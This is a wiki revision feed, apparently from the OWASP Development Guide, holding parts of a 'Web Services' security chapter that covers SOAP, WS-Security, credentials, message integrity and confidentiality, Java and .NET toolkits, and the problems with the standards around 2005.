Another aspect of the problem is when users are not shared across domains, but merely the fact that a user with certain ID has successfully authenticated in another domain, as would be the case with several large corporations, which would like to form a partnership, but would be reluctant to share customers’ details. The decision to accept this request is then based on the inter-domain procedures, establishing special trust relationships and allowing for exchanging such opaque tokens, which would be an example of Federation relationships. Of those efforts, most notable example is Liberty Alliance project, which is now being used as a basis for SAML 2.0 specifications. The work in this area is still far from being completed, and most of the existing deployments are nothing more than POC or internal pilot projects than to real cross-companies deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security to the message exchanges – it is the installed implementations, which will be assessing conformance of the incoming SOAP messages to the applicable standards, as well as appropriately securing the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, .NET platform is not trying to catch up immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at the version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what is going to happen when .NET 2.0 finally sees the world. The next release of WSE, 3.0, is going to coincide with VS.2005 release and will take advantages of the latest innovations of .NET 2.0 platform in messaging and Web Application areas.&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service, and the interoperability is a requirement (which is usually the case), in addition to the questions of security testing one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of .NET Web Service tools frequently do not cleanly handle WS-Security’s and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said – WSE package itself contains very rich and well-structured functionality, which can be utilized both with ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers from knowing these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing for basic message security and WS-Trust with WS-SecureConversation. Those are needed for establishing secure exchanges and sessions - similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging the implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is commercial software package from Phaos (now owned by Oracle), which suffers from a lot of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for Web Service security specifications in the version 1.5 is only limited to implementation of the core WSS standard with username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems, rather than toolkits or frameworks. On one hand, they usually provide rich functionality right off the shelf, on the other hand – its usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but handing system developers necessary tools to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy, check signatures, tokens, etc, before passing them on to the target Web Service. When applied to the outgoing SOAP messages, they act as a proxy, now altering the messages to decorate with the required security elements, sign and/or encrypt them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide high level of integration with the existing enterprise infrastructure, relying on the back-end user and policy stores to look at the credentials, extracted from the WSS header, from the broader perspective. An example of such service is TransactionMinder from the former Netegrity – a Policy Enforcement Point for Web Services behind it, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken gigabyte processing threshold, and allow for real-time processing of huge documents, decorated according to the variety of the latest Web Service security standards, not only WSS. The usage simplicity is another attractive point of those systems - in the most trivial cases, the hardware box may be literally dropped in, plugged, and be used right away. These qualities come with a price, however – this performance and simplicity can be achieved as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with the back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such hardware device, Layer 7 Technologies provides a scalable SecureSpan Networking Gateway, which acts both as the inbound firewall and the outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they can really catch on. Here is a brief look at what problems surround currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (couple years old at most), or still being developed. Although standards development is done in committees, which, presumably, reduces risks by going through an exhaustive reviewing and commenting process, some error scenarios still slip in periodically, as no theory can possibly match the testing resulting from pounding by thousands of developers working in the real field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that for political reasons some of these standards are withheld from public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task, which is an accepted reality, and SOAP processing slows it down even more. Now, with expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market are facing this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while substantially (by orders of magnitude) improving the performance, cannot always be used as an optimal solution, as they cannot be easily integrated with the already existing back-end software infrastructure, at least – not without making performance sacrifices. Another consideration whether hardware-based systems are the right solution – they are usually highly specialized in what they are doing, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services, but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As could be deduced from the previous sections, Web Service security standards are fairly complex, and have very steep learning curve associated with them. Most of the current products, dealing with Web Service security, suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all different policies, identities, keys, and protocols takes a lot of time and good understanding of the involved technologies, as most of the times errors that end users are seeing have very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standard’s bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define the rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying the administrators with ready for deployment security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since PKI mechanism has a lot of well-documented deployment and usability issues. Those systems that opt to use homegrown mechanisms for key management run significant risks in many cases, since questions of storing, updating, and recovering secret and private keys more often than not are not adequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59469</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59469"/>
				<updated>2009-04-26T11:57:03Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Referencing message parts */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web services developers, and methods to address common issues. Due to the space limitations, it cannot look at all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader to the appropriate usage patterns, and warn about potential roadblocks on the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some are heralding Web Services as the biggest technology breakthrough since the web itself; others are more skeptical that they are nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better because a C# application could read the data.  But this has another flaw:  Lets assume your stock application is not the only one the C# application needs to interact with.  Maybe it needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable research to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format.  A format that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and even more often implemented approach – “we are using SSL to protect all communication, we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of most common pitfalls when using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on the server (even if it is not the intended recipient), they exist in the clear-text form, at least – temporarily. Storing the transmitted information at the intermediate aggravates the problem or destination servers in log files (where it can be browsed by anybody) and local caches.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials, ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent, but accepts a different format of the same credentials, would require altering the client and prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said – the reality is that the most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such approach, and make conscious trade-offs at the design time, whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require converting them into text prior to sending and unambiguously restoring them upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
&lt;br /&gt;
Second, passing credentials carries an inherited risk of their disclosure – either by sniffing them during the wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted, or just never sent “in the clear”. Usual ways to avoid sending sensitive credentials are using cryptographic hashing and/or signatures.&lt;br /&gt;
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e. it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even if it is sufficiently protected against tampering, since it is the message itself that is used for attack now (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
Usual means to protect against replayed messages is either using unique identifiers (nonces) on messages and keeping track of processed ones, or using a relatively short validity time window. In the Web Services world, information about the message creation time is usually communicated by inserting timestamps, which may just tell the instant the message was created, or have additional information, like its expiration time, or certain conditions.&lt;br /&gt;
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew,” whereas server or clients' clocks drift too much, preventing timely message delivery, although this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may be expiring while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received by a web service, it must always ask two questions: “whether I trust the caller,” “whether it created this message.” Assuming that the caller trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). This may affect technical qualities of a SOAP message, such as the message’s timestamp, or business content, such as the amount to be withdrawn from the bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually some mechanisms like checksum applied to ensure packet’s integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably tracked back to the issuer. The required association may be established by utilizing HMAC, or by combining message digests with either cryptographic signatures or with secret key-encryption (assuming the keys are only known to the two communicating parties) to ensure that any change will immediately result in a cryptographic error.&lt;br /&gt;
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, it is not sufficient to ensure the integrity – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. It may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since it is significantly faster than the asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
Applying encryption requires conducting an extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities - the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by the server controlled by members of IT department. &lt;br /&gt;
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
&lt;br /&gt;
There is another significant problem here – the traditional HTTP firewalls do not help at stopping attacks at the Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and make intelligent decision about passing SOAP messages to their destination. The reader would need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task, typically required from the audits, is reconstructing the chain of events that led to a certain problem. Normally, this would be achieved by saving server logs in a secure location, available only to the IT administrators and system auditors, in order to create what is commonly referred to as “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following the standard legal practice, electronic documents now require some form of an “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as the WS are concerned, such level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile – XML-based communication, described by an XML-based grammar, called Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces, consisting of messages, expressed as XML Schema, and operations, to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the most well known industry group, which owns many Web-related standards and develops them in Working Group format. Of particular interest to this chapter are XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in the W3C’s jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote a general framework for interoperable Web Services. Mostly its work consists of taking other broadly accepted standards, and developing so-called profiles, or sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS’ WS-Security standard and specifies sets of optional and required security features in Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is not strictly Web Service-specific, but rather general, it is important for this topic because of its close relation with the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, that join them to work on a particular issue or proposal. Results of these joint activities, once they reach certain maturity, are often submitted to standardizations committees as a basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into Header and Body, can theoretically be transmitted over a number of transport protocols, but only HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and Document-style communication, with message contents based exclusively on XML Schema definitions in the Web Service’s WSDL. Invocation results may be optionally returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
SOAP protocol, while defining the communication framework, provides no help in terms of securing message exchanges – the communications must either happen over secure channels, or use protection mechanisms described later in this chapter. &lt;br /&gt;
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212&amp;lt;/u&amp;gt;/), and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications add integrity, message and signer authentication, as well as support for encryption/decryption of whole XML documents or only of some elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of those standards comes from the highly flexible framework developed to reference the data being processed (both internal and external relative to the XML document), refer to the secret keys and key pairs, and to represent results of signing/encrypting operations as XML, which is added to/substituted in the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications being currently developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with the input from Verisign, RSA Security, and other participants, developed a family of specifications, collectively known as “Web Services Roadmap”. Its foundation, WS-Security, has been submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still found in different development stages, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al), trust issues and security token exchange (WS-Trust), establishing context for secure conversation (WS-SecureConversation). One of the specifications in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently does not have industry momentum behind it.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of a “Roadmap”, which was later renamed to Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for developing message-based security exchange. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. Current version is 1.0, and the work on the version 1.1 of the specification is under way and is expected to be finishing in the second half of 2005.&lt;br /&gt;
[[category:FIXME | outdated info? is it complete now?]]&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
Flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols that are being developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standards are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens, passed in WSS messages, and ways of attaching them to the message may vary substantially. At the high level the WSS standard defines three types of security tokens, attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of those types is further specified in one (or more) profile document, which defines additional tokens' attributes and elements, needed to represent a particular type of security token. &lt;br /&gt;
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is providing tools for message-level communication protection, whereas each message represents an isolated piece of information, carrying enough security data to verify all important message properties, such as: authenticity, integrity, freshness, and to initiate decryption of any encrypted message parts. This concept is a stark contrast to the traditional channel security, which methodically applies pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data for higher level protocols. Those protocols, based on the standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard to detect problems, as is also discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents – one core document, which defines how security headers may be included into SOAP envelope and describes all high-level blocks, which must be present in a valid security header. Profile documents have the dual task of extending definitions for the token types they are dealing with, providing additional attributes, elements, as well as defining relationships left out of the core specification, such as using attachments.&lt;br /&gt;
&lt;br /&gt;
